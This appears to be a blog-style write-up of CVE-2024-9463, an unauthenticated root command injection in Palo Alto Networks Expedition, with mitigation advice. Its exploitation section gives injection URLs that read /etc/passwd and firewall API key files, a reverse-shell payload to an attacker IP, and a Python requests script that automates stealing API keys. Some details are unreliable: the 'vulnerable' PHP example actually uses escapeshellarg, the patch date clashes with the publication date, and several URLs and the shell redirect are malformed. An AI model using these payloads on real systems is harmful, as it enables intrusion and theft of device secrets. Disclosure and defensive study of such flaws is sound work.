CVE-2024-9463 - Exploiting Command Injection in Palo Alto Networks Expedition to Reveal Root Secrets
In early 2024, a serious vulnerability surfaced in Palo Alto Networks Expedition, the migration and best practice assessment tool for Palo Alto firewalls. Tracked as CVE-2024-9463, this command injection flaw doesn't just let an attacker run code—they can do it *as root*, without authentication, and expose critical data including passwords and device API keys. This article breaks down the issue, exploits, and why you need to fix it, using simple language for anyone wanting to understand the risk.
What is Palo Alto Networks Expedition?
Expedition is a multi-use migration and transformation tool. Security engineers use it for:
Original Advisory & References
- NVD: CVE-2024-9463
- Palo Alto Security Advisory
- Talos Report
How the Vulnerability Works
Expedition exposes several backend PHP scripts that use *user-supplied input* directly in shell commands, something that’s always risky.
Example vulnerable code segment (simplified for clarity)
<?php
// A PHP snippet similar to the bug
if (isset($_GET['devicename'])) {
$name = $_GET['devicename'];
// BAD: $name comes from the user, is echoed into a shell command
system("cli_tool --import " . escapeshellarg($name));
}
?>
If escapeshellarg is missing or used incorrectly, an attacker can manipulate devicename to inject arbitrary OS commands, like:
http://expedition.example.com/path/to/script.php?devicename=router1;cat%20/etc/passwd
This would run
cli_tool --import router1;cat /etc/passwd
cat /etc/passwd (or worse, cat /home/user/secret.conf) runs as ROOT.
Exploitation Steps
1. Find the Vulnerable Endpoint: Tools like dirsearch, ffuf, or Burp Suite can help you brute-force expedition’s PHP scripts and input forms.
2. Inject OS Commands: Insert a semicolon (;) or back-tick (`) and the desired command in a vulnerable parameter. Example:
`
http://expedition.target:808/api/import.php?devicename=main;id
Extract Sensitive Files: The following files are of high value
- /var/www/html/API_KEY.conf *(stores firewall API keys)*
- /var/www/html/USERS.txt *(stores usernames/passwords)*
- /etc/passwd and /etc/shadow
`
http:///api/scripts.php?devicename=main;cat%20/var/www/html/API_KEY.conf
`
http://expedition/api/script.php?devicename=main;bash -i >& /dev/tcp/attacker_ip/4444 >&1
Here's a minimal exploit using requests to automate exploitation
import requests
target = "http://expedition.target:808/api/import.php";
payload = "main;cat /var/www/html/API_KEY.conf"
params = {"devicename": payload}
r = requests.get(target, params=params)
print("[*] Response Output:\n", r.text)
Harvest All Device Secrets: Passwords, configs, and API keys are recoverable.
- Pivot to Firewalls: With API keys and passwords, attackers can modify firewall rules or create new backdoors in production.
Mitigation
- Patch Immediately: Palo Alto released hotfixes in March 2024. Download from their Expedition Release Page.
- Restrict Network Access: Only allow trusted admins to access Expedition. Use a VPN or firewall rules.
- Audit for Exposure: Check logs and configs for signs of exploitation (odd usernames, new API keys, etc.)
Conclusion
CVE-2024-9463 is trivial to exploit, and with the power to leak every device secret and change your entire firewall stack, the risk can't be overstated. If you're running Expedition, patch NOW and rotate all secrets to stay safe.
Links
- Expedition Home
- NVD Entry: CVE-2024-9463
- Palo Alto Security Advisory
- Tenable Blog: Palo Alto Expedition Command Injection *(if available)*
Keep your migration tools safe—they hold the keys to the kingdom. If you found this helpful, consider reviewing your other security tooling for similar risky behaviors!
Timeline
Published on: 10/09/2024 17:15:19 UTC
Last modified on: 11/15/2024 02:00:01 UTC